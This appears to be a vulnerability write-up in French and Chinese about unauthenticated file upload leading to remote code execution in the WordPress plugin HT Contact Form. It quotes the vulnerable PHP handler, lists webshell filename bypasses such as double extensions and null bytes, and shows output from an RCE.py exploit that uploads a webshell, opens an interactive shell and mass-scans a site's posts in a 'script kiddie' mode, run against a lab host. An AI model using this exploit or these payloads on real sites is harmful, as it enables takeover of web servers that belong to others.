
Emplacement de la vulnérabilité : ht-contactform/admin/Includes/Services/FileManager.php
Fonction clé : temp_file_upload()
temp_file_upload#63行
public function temp_file_upload($file) {
$destination = "{$this->dir}/temp";
$this->maybe_create_directories($destination);
// Validate file
$validation = $this->validate($file);
if (!$validation['valid']) {
wp_send_json_error($validation['message']);
return;
}
// Process the file
$filename = $this->process_filename($file['name']);
$file_path = "{$destination}/$filename";
// Move file to temporary directory
if (move_uploaded_file($file['tmp_name'], $file_path)) {
wp_send_json_success([
'file_id' => $filename,
'file_name' => $file['name'],
'file_size' => $file['size']
]);
return;
}
}
AJAXEmplacement du fichier : ht-contactform/admin/Includes/Ajax.php :
#46-47行
add_action('wp_ajax_ht_form_temp_file_upload', [$this, 'temp_file_upload']);
add_action('wp_ajax_nopriv_ht_form_temp_file_upload', [$this, 'temp_file_upload']);
Problème : le hook wp_ajax_nopriv_ est utilisé, ce qui signifie que des utilisateurs non authentifiés peuvent également accéder à la fonctionnalité de téléversement de fichiers.
Analyse de la cause racine :
validate de FileManager.php, seules les erreurs de téléversement PHP sont vérifiées ; le type de fichier, l'extension ou le type MIME ne sont pas du tout validés.Fields.php, mais cette configuration n'est utilisée que pour la validation front-end lors du rendu du formulaire (attribut accept) ; elle n'est jamais utilisée pour une validation côté serveur.sanitize_file_name() gère principalement les caractères spéciaux et n'empêche pas les extensions dangereuses ; un attaquant peut toujours téléverser des fichiers tels que .php、.php3、.phtml ;// Ajax.php 第46-47行
add_action('wp_ajax_ht_form_temp_file_upload', [$this, 'temp_file_upload']);
add_action('wp_ajax_nopriv_ht_form_temp_file_upload', [$this, 'temp_file_upload']);
Analyse du problème :
Attaque directe : l'attaquant peut envoyer une requête POST directement à /wp-admin/admin-ajax.php avec l'action ht_form_temp_file_upload
Contournement de la validation front-end : le front-end utilise l'attribut accept pour limiter les types de fichiers, mais l'attaquant peut facilement le contourner
Exécution du fichier : le fichier PHP téléversé peut être exécuté par le serveur web, conduisant à une exécution de code à distance
shell.php.jpg
shell.php.png
shell.php.gif
shell.PHP
shell.Php
shell.pHp
shell.php%00.jpg
À noter : l'URL n'est exploitable que si elle correspond à un article publié via le plugin. J'ai donc ajouté une fonctionnalité « script kiddie » 02.
01 [Test unique] Exemple :
python RCE.py -u http://192.168.162.131:8081/2025/08/04/test-0-1/
开始尝试.......
获取目标页面...
提取参数...
提取的Nonce: b05a39ff55
AJAX端点: http://192.168.162.131:8081/wp-admin/admin-ajax.php
表单ID: 6
生成webshell...
上传shell,请稍等...
[+] 漏洞利用成功!
Webshell地址: wp-content/uploads/ht_form/temp/6890c4e6f389c-shell.php
[+] 进入shell交互模式,输入'exit'退出!
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell> exit
退出交互模式
02 [Test du répertoire racine] Exemple :
python RCE.py -r http://192.168.162.131:8081
[*] 请输入日期 (默认20250804):
[*] 使用的日期: 20250804
[*] 正在扫描日期: 2025-08-04
[*] 扫描地址: http://192.168.162.131:8081/2025/08/04/
[*] 发现文章2: Test.0.1
[*] 发现文章3: 8 月 4, 2025
[*] 发现文章6: 世界,您好!
[*] 发现文章7: 8 月 4, 2025
[*] 开始漏洞利用...
[*] 正在利用: http://192.168.162.131:8081/2025/08/04/test-0-1/
开始尝试.......
获取目标页面...
提取参数...
提取的Nonce: b05a39ff55
AJAX端点: http://192.168.162.131:8081/wp-admin/admin-ajax.php
表单ID: 6
生成webshell...
上传shell,请稍等...
[+] 漏洞利用成功!
Webshell地址: wp-content/uploads/ht_form/temp/6890c53ca8d5c-shell.php
[+] 进入shell交互模式,输入'exit'退出!
shell> whoami
www-data
shell> ls
68908c7a7f86d-shell.php
68908fdbba025-shell.php
6890917c70228-shell.php
6890919055905-shell.php
689094afb2f6e-shell.php
6890977a20a7c-shell.php
689097bf2dce9-Users.txt
6890c4e6f389c-shell.php
6890c53ca8d5c-shell.php
index.php
shell> exit
退出交互模式